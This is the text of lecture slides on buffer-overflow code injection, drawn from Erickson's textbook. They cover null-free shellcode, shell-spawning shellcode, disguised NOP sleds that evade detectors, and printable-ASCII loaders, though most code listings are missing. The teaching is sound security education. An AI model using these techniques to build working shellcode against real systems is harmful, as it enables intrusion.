Week 2: Buffer Overflow Part 2
Outline Buffer overflow techniques– continued Assuming the stack is executable, we can also insert code on the stack Shellcode development (0x510 - 0x530)
What We Can Do So Far If there is a vulnerable buffer that can be overflown, then we can Change variables by overflowing them As long as they are after the vulnerable buffer Their values are not changed after the vulnerable function call (such strcpy and similar functions) Change the flow by overflowing return address on the stack We can call a sequence of functions in the file Ret2libc (0x6b0) Return oriented programming (ROP) However, we cannot inject new instructions
Buffer Overflow Example
Code Injection via Executable Stack If the stack is executable, we can then also inject instructions on the stack by overflowing the buffer and then changing the return address to be inside the overflown buffer There is one problem we need to solve First we need to write suitable instructions
Shellcode Development The code to be injected as part of a string has some additional requirements Can it contain calls to specific addresses? Can it contain instructions where some bytes are zero? In general, the code to be injected should be as short as possible Because the space is often limited
A Simple Assembly Program
Problems to Be Solved We can not have a separate data segment How can we define a data segment then?
Problems to Be Solved We can not have a separate data segment How can we define and use data then? Use a call instruction and place the data right after the call instruction Use the stack
Call Instructions in x86
A Version with No Data Segment
A Version with No Data Segment The program can be compiled into machine language using “nasm helloworld1.s” for example
A Version with No Data Segment – cont.
A Version with No Data Segment – cont. Can we inject the code by overflowing a string buffer?
A Version with No Data Segment – cont. Can we inject the code by overflowing a string buffer? No, as there are null bytes in the code.
A Version with No Data Segment – cont. How can we remove the null bytes?
A Version with No Data Segment – cont. How can we remove the null bytes? We can remove the first on by using a jump and call backward. Why will it work?
Removing Null Bytes
Removing Null Bytes – cont. How about the other null bytes?
Removing Null Bytes – cont.
Removing Null Bytes – cont.
Shell-Spawning Shellcode How can we create a shell using a short code segment like a shellcode? We used system in libc to run another program (including a shell program (such /bin/sh)) However, calling the system is problematic here as we do not know if system() is available and where if it is available
Shell-Spawning Shellcode System function itself is implemented similar to the following code segment
Shell-Spawning Shellcode
Shell-Spawning Shellcode
Shell-Spawning Shellcode
Shell-Spawning Shellcode – cont.
Shell-Spawning Shellcode – cont.
Shell-Spawning Shellcode – cont.
Testing Shellcode Here is a short program that can be used to test a shellcode segment You need to allow an executable stack Example compiler options: gcc –z execstack –m32 –g –o sc2 sc2.c
Injecting Shellcode Using the Example
Overflowing the Return Address In this case, we need to overflow the return address using the address of the beginning of the shellcode In this case, as we know the exact layout of the stack, it is not a problem However, in a real world situation, it is no longer the case and we have to figure out the correct address We can do it by trial and error Is there a way to improve the chance or reduce the necessary number of trials?
Overflowing the Return Address There are two techniques that can be used to reduce the number of trials We can repeat the address a number of times If one of them overwrites the return address, we will be fine We can also insert some other instructions that do not affect the execution at the beginning so that the code will work properly as long as we return to one of the “NOP” instructions
Overflowing the Return Address A typical shell code will have the following form
Overflowing the Return Address For x86, (0x90) is a NOP instruction xchg eax, eax Which has no effect However, malware and other detectors are designed to look for repeated NOP instructions as a sign of code injection Can we improve? How?
Hiding the Sled Since we zero out the registers at the beginning of shellcode, we can use combinations of the following opcodes (or instructions)
Hiding the Sled – cont. One can also use pairs of instructions that are equivalent of NOPs
Hiding the Sled – cont.
Approximating the Return Address This example is from the Art textbook on pages 140 – 141.
Using the Environment On Linux machines, the location of environments on the stack is predictable We can hide the shellcode in an environment variable and pass it to the program via execle
Using the Environment
Printable ASCII Shellcode Note strings typically consist of only printable ASCII shellcode The shellcodes we have so far consist of all possible bytes
Printable ASCII Shellcode How can build shellcodes using only printable ASCII characters? Printable ASCII characters are from 0x20 (‘ ‘, space) to from 0x7e (‘~’) But our shellcodes should consist of valid x86 instructions What can we do?
Printable ASCII Shellcode A small subset of x86 instructions that are printable and eax, 0x454eff4a %JONE sub eax, 0x41414141 -AAAA push eax P pop eax X push esp T pop esp \
Printable ASCII Shellcode Can we encode the following shellcode using printable ASCII shellcode?
The Plan We will encode the shellcode using printable characters only When we execute the encoded code, it will become the original shellcode on stack We will start running the shellcode when the encoded code is finished
The Plan
The Plan How? We need to overwrite the return address so that the loaded program will start executing We will change ESP so that it is higher than EIP We will then initialize EAX to zero How using printable characters only? We will give the shellcode starting from the end first In this case, it will be 0x80cde190 Then we will generate four bytes each time by subtracting
The Loader
The Loader Polymorphism Note that there are many equivalent ways of generating the loader code given a shellcode We will have many ways to zero out eax using only printable characters Given two hexadecimal integers, there are often many ways to change one to the other using “sub eax” instructions
Testing
Summary By exploiting a buffer overflow vulnerability, we can always overflow the return address Therefore we can always change the control flow We may also change the values of local variables When the stack is executable, we can also inject (malicious) instructions on the stack Such code segments must be position independent They cannot contain null bytes (in the middle) Null bytes must be removed Such code segments are typically called shellcodes As they often create a shell so that hackers can run commands afterwards
Citations Hacking: The Art of Exploitation (2nd Ed.) – Jon Erickson 2008